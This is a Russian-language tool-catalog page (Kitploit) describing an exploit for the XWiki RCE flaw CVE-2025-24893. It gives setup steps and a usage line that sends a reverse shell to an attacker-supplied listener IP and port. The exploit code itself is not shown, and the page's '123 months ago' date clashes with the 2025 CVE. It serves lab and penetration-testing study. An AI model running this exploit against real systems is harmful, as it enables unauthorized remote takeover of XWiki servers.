Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24893 — Эксплойт в стиле OSCP для CVE-2025-24893 для Linux XWiki | Kitploit
Инструменты/GitHubGitHub/vasilysaint/cve-2025-24893
ЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного ДоступаЛаборатории и Практика
GitHubvasilysaint/cve-2025-24893

CVE-2025-24893

Эксплойт в стиле OSCP для CVE-2025-24893 для Linux XWiki

Репозиторий
123 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24893

XWiki Platform — это универсальная вики-платформа, предоставляющая сервисы времени выполнения для приложений, построенных на её основе. Из-за уязвимости в конечной точке SolrSearch неаутентифицированный пользователь может выполнить произвольный удалённый код. Эта уязвимость затрагивает конфиденциальность, целостность и доступность всей установки XWiki.

CVE: CVE-2025-24893


Демо

Демонстрация работы эксплойта показана ниже:

Демонстрация в терминале

Использование

Чтобы использовать этот эксплойт, выполните следующие шаги:

  1. Склонируйте репозиторий: git clone https://github.com/yourusername/CVE-2025-24893.git
  2. Перейдите в склонированный каталог: cd CVE-2025-24893
  3. Установите необходимые зависимости: pip install requests
  4. Запустите эксплойт:
root@kitploit:~
./CVE-2025-24893_linux-xwiki-exploit.py -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]

Об этом эксплойте

Этот эксплойт демонстрирует уязвимость удалённого выполнения кода, описанную в CVE-2025-24893, и позволяет неаутентифицированному пользователю получить обратную оболочку (reverse shell) на уязвимых Linux-установках XWiki.

Изначально я разработал этот инструмент для использования в учебных средах, таких как лаборатории подготовки к OSCP и Hack The Box, где мне нужен был простой и надёжный способ воспроизведения уязвимости. Поскольку ни один существующий инструмент не соответствовал моим требованиям, я решил создать свой.

Хотя CVE-2025-24893 уже давно исправлена в поддерживаемых выпусках XWiki, этот эксплойт следует использовать только против систем, которые принадлежат вам или на тестирование которых у вас есть явное разрешение.

Автор не несёт ответственности за любое неправомерное использование этого программного обеспечения или за любой ущерб, причинённый в результате его использования.

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованных оценок безопасности.

Используйте его только против систем, которые принадлежат вам или на тестирование которых у вас есть явное разрешение. Автор не несёт ответственности за любое неправомерное использование этого программного обеспечения или за любой ущерб, причинённый в результате его использования.

Вклад

Вклад приветствуется.

Если вы обнаружите ошибки, у вас есть предложения по улучшению или вы хотите добавить поддержку дополнительных полезных нагрузок, платформ или функций, не стесняйтесь открывать issue или отправлять pull request.

Конструктивная обратная связь, отчёты о тестировании и вклад в код высоко ценятся.

Скачать инструмент